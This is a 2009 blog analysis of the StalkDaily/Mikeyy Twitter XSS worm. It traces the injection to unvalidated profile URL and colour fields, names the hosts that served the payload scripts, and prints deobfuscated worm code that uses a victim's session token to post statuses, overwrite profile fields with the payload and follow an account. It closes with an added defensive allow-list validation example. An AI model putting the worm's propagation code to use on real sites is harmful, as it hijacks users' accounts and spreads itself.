Mundorévès

Every day I find myself in an upside-down world

News from April, 2009

2009/04/12
Examining the StalkDaily-Mikeyy twitter worm...
Last changed: Apr 12, 2009 16:56 by Roberto Dominguez

Learnt about the worm this morning, and it didn't take too long to find an infected profile just by searching.

The cause is a silly bug in handling form input posted to the server, which allows code injection.

After a quick examination of the source, I found the injected code in the obvious place, where you get to enter a URL in the profile:

But after examining the source I found that the vulnerability is not only in the URL but also in the decoration.

Look at the Twitter colour design section:

Seems harmless, right? However, when the user selects the colours they are submitted to the server, and if that input is not properly escaped and validated, code can be injected:

The actual injected code has already been identified, but we might be talking about a variation.

In other words, the vulnerability is not only in places where users can enter text, but anywhere data is posted to the server. This means that other fields might be vulnerable too.

We all make coding mistakes, but where I think Twitter FAILED was in not fixing it properly when StalkDaily came up.

UPDATE 1

The injected code tries to load the script from content.ireel.com/jsxss.js, which is obfuscated, but so far it looks like what has already been posted; the only thing it changes is the messages shown:

_0x4c9d[38] Twitter should really fix this... Mikeyy
_0x4c9d[39] I am done... Mikeyy
_0x4c9d[40] Mikeyy is done..
_0x4c9d[41] Twitter please fix this, regards Mikeyy

UPDATE 2

It also tries to load a script from bambamyo.110mb.com/wompwomp.js

I also found that he is more creative in this script and encodes the script injection twice...

As suspected, the code is injected in the profile URL and in the background colour:

    var _0xcd6ax1c = new XHConn();
    _0xcd6ax1c.connect("/status/update", "POST", "authenticity_token=" +
            token + "&status=" + _0xcd6ax18 + "&return_rendered_status=true&twttr=true");
    var _0xcd6ax1d = new XHConn();
    _0xcd6ax1d.connect("/account/settings", "POST", "authenticity_token=" +
            token + "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
            + _0xcd6ax1b + "&tab=home&update=update");
    var _0xcd6ax1e = new XHConn();
    _0xcd6ax1e.connect("/account/profile_settings", "POST", "authenticity_token=" +
            token + "&user[profile_default]=false&tab=none" +
            "&profile_theme=0&user[profile_use_background_image]=0" +
            "&user[profile_background_tile]" +
            "=0&user[profile_link_color]=" + _0xcd6ax1b
            + "&commit=save+changes");
    var _0xcd6ax1f = new XHConn();
    _0xcd6ax1f.connect("/account/settings", "POST", "authenticity_token=" + token +
            "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
            + _0xcd6ax1b + "&tab=home&update=update");
    var _0xcd6ax20 = new XHConn();
    _0xcd6ax20.connect("/account/profile_settings", "POST", "authenticity_token=" +
            token + "&user[profile_default]=false&tab=none&profile_theme=" +
            "0&user[profile_use_background_image]=0&user[profile_background_tile]" +
            "=0&user[profile_link_color]=" + _0xcd6ax1b + "&commit=save+changes");
    var _0xcd6ax21 = new XHConn();
    _0xcd6ax21.connect("/account/settings", "POST", "authenticity_token=" + token +
            "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
            + _0xcd6ax1b + "&tab=home&update=update");

As seen above, it replaces the user's name with "Womp" followed by spaces.

UPDATE 3: The risks

So far the script does not cause major harm, but it could do more damage, such as posting the email address (which is confidential) or triggering the 'forgot password' flow.

There is no risk of the password being changed, as Twitter requires the current password to be entered, and the script does not have it.

Posted at 12 Apr @ 7:28 AM by Roberto Dominguez | 0 Comments
2009/04/17
Mikeyy's worm is back...
Last changed: Apr 17, 2009 13:58 by Roberto Dominguez

It's back, but this time it seems like they're jealous of Mikeyy getting a new job. Somebody hacked his site and actually stored the new XSS script on it.

This script is now hosted at 74.200.253.195/xss.js, an address which, according to this blog, used to host Mikeyy's servers (Haxyou.com, Michangelomooney.com and Stalkdaily.com). I tried to resolve the addresses but got server timeouts; probably the DNS servers for the domains were changed too, which is why the script uses the IP address instead of the host name.

What's new is that the script exploits another field that is not validated, meaning that Twitter have not cleaned up their mess. As I've pointed out, they have to look at every posted request.

    var _0x4874x1b = new XHConn();
    _0x4874x1b.connect("/status/update", "POST", 
            "authenticity_token=" + 
             _0x4874x15 + "&status=" + _0x4874x1a +
             "&return_rendered_status=true&twttr=true");
    var _0x4874x1c = new XHConn();
    _0x4874x1c.connect("/account/settings", "POST",
            "authenticity_token=" + _0x4874x15 +
           "&user[name]=" + bypassEncode +
           "&user[url]=" + bypassEncode +
           "&user[description]=" + bypassEncode +
           "&user[location]=" + bypassEncode +
           "&user[protected]=0&commit=Save");
    var _0x4874x1d = new XHConn();
    _0x4874x1d.connect("/account/profile_settings", "POST", 
            "authenticity_token=" +
            _0x4874x15 + "&user[profile_sidebar_border_color]=" +
            xss + " &commit=save+changes");
    var _0x4874x1e = new XHConn();
    _0x4874x1e.connect("/friendships/create/32336151", "POST", 
            "authenticity_token=" + _0x4874x15 + "&twttr=true");

The code is injected in the profile sidebar border colour. What's funny too is that it adds a friendship with user #32336151... haven't figured out who that is...

Posted at 17 Apr @ 1:12 PM by Roberto Dominguez | 0 Comments
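Both posts make the same point: the fix is not to patch the URL field, but to validate every field of every posted request against an allow-list. The following is an added example in Node.js, written for this page and not Twitter's code or the worm's, that does exactly that for a form body in the same shape as the captured requests (link colour, sidebar border colour, URL, name, description, location). The per-field rules and length limits are assumptions made for the illustration.

```javascript
// Added example (not Twitter's code, not the worm's): a server-side
// allow-list for the profile settings form, keyed by the Rails-style
// field names seen in the captured requests. The per-field policy and
// the length limits are assumptions made for this illustration.
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ({
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
})[c]);

// Every field the endpoint accepts and how it is validated. Keys not
// listed are dropped, so a form gaining a field cannot silently add an
// unvalidated injection point.
const POLICY = {
  "user[profile_link_color]": { kind: "color" },
  "user[profile_sidebar_border_color]": { kind: "color" },
  "user[url]": { kind: "url" },
  "user[name]": { kind: "text", max: 20 },
  "user[description]": { kind: "text", max: 160 },
  "user[location]": { kind: "text", max: 30 },
};

function validateField(kind, value, max) {
  switch (kind) {
    case "color": // exactly six hex digits: nothing else reaches the CSS
      return /^[0-9a-f]{6}$/i.test(value) ? value.toLowerCase() : null;
    case "url": { // absolute http(s) only; javascript:/data: are refused
      let u;
      try { u = new URL(value); } catch { return null; }
      return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
    }
    case "text": // length-capped and HTML-escaped before it is stored
      return value.length <= max ? escapeHtml(value) : null;
    default:
      return null;
  }
}

// Parses an application/x-www-form-urlencoded body ("+" decodes to a
// space, as in the "Womp+++" name above) and returns what was accepted
// and which keys were dropped because they were unknown or invalid.
function sanitizeProfileSettings(body) {
  const accepted = {}, dropped = [];
  for (const [key, raw] of new URLSearchParams(body)) {
    const rule = POLICY[key];
    const clean = rule ? validateField(rule.kind, raw, rule.max) : null;
    if (clean === null) dropped.push(key); else accepted[key] = clean;
  }
  return { accepted, dropped };
}
```

The CSRF token and submit-button fields (authenticity_token, commit, tab) are handled by the framework before this step in a real application; here they simply land in `dropped`.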
